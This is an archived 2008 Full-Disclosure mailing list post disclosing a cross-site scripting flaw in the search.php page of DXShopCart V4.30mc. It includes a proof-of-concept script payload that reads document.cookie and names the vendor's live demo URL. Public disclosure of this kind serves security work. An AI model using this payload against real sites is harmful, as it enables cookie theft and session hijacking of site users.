full-disclosure-uk August 2008 archive
Main Archive Page > Month Archives  > full-disclosure-uk archives
full-disclosure-uk: [Full-disclosure] DXShopCart V4.30mc search.

[Full-disclosure] DXShopCart V4.30mc search.php XSS

From: bug squash <bugsquashr_at_nospam>
Date: Thu Aug 21 2008 - 19:52:43 GMT
To: full-disclosure@lists.grok.org.uk


###################################

DXShopCart V4.30mc search.php XSS
###################################

Author: d00m3d! Chik3n hUnT3r 666
email: bugsquashr@gmail.com

Example:
<script>alert(document.cookie)</script>

in the product search on http://www.scripts4profit.net/ShopCartDX/index.php

click submit - doh!

###################################



Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/